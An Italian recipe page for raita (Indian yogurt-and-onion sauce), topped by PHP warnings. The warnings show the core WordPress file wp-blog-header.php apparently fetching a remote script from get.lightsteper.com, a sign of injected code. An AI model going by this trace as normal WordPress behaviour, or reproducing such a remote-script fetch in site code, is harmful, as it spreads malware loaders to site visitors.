Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17

Warning: file_get_contents(http://get.lightsteper.com/scripts/way.js): failed to open stream: php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17
Raita (salsa indiana) - YouMum

raita (salsa indiana)

Riproduci video

La raita è una salsa indiana velocissima da preparare.

Trovi la ricetta del raita nel video al min. 2:42

I suoi ingredienti sono semplici ed economici, ma il loro sapiente accostamento è in grado di dar vita ad un condimento fresco e leggero.

Di questa ricetta esistono infinite varianti, tanto dipende dalla regione dell’India da cui è originaria e alla stagionalità degli ingredienti.

Cosa certa è che per la ricetta base si prevedono 2 immancabili ingredienti: lo yogurt bianco (vaccino o vegetale come preferite) e le spezie. Quest’ultime possiamo dosarle a nostro piacimento, l’importante è che la salsa si mantenga fresca e gradevole.

La Raita è perfetta per accompagnare verdurine crude, insalate o come salsa per guarnire un chapati (il tipico pane indiano non lievitato). Clicca qui per ricetta chapati

 

Ingredienti:
  • 3 cipolle
  • 1 cuc.no sale
  • Succo 1 limone e mezzo
  • Pepe
  • Cumino
  • 350 gr yogurt bianco (anche di soia o di cocco)
  • 1 cucch. malto (o miele)
  • 1 spicchio aglio
 
Procedimento:
  1. Tagliate le cipolle a fettine sottili e mettetele in una ciotola capiente.
  2. Versateci del succo di un limone e un cuc.no di sale, mischiate e amalgamate, massaggiando il tutto a mani nude per far omogenizzare la presenza di sale sulla totalità delle cipolle.
  3. Lasciate marinare il tutto per almeno 30 min (potete anche arrivare a diverse ore se avete tempo, considerate che più restano a marinare più croccanti e dolci diventeranno). Per aiutare questo processo di usa pressarle. Basta coprirle con un piatto e metterci sopra un peso (io ho usato un barattolo di sale grosso).
  4. Alla fine del processo di marinatura scolatele dall’acqua di fermentazione. Noterete che saranno diminuite di volume e avranno perso la tipica nota pungente delle cipolle crude.
  5. È ora di passare al condimento: aggiungiamo quindi lo yogurt, lo spicchio d’aglio tritato, il cumino, il succo di mezzo limone, il sale, il pepe, la menta e il malto.
 

Et woilà, una salsa ever green, fresca, agrodolce, personalizzabile e semplicissima.

 

TIPS: Se non amate le cipolle potete sostituirle con 3 cetrioli e procedere allo stesso modo.

 

Un’ottima idea per arricchire il vostro aperitivo primaverile, per farcire le vostre piadine veg, per condire le vostre insalatone estive o per rinfrescare i vostri arrosti o i vostri spezzatini, siano questi di carne (mangiatene poca!) o di seitan 😉.

 

Enjoy,

Baci Verdi

Vuoi preparare un menù indiano? Ecco tutte le ricette che ti servono:

Dhal di lenticchie con riso pilaf

dhal di lenticchie e riso basmati

Piselli Speziati

piselli speziati

Insalata di cetrioli speziati

cetrioli speziati

Aloo Gobi

aloo gobi

Chapati

chapati

Vuoi sorprendere la tua famiglia con ricette nuove, semplici e alternative?

Clicca qui per guardare tutte le ricette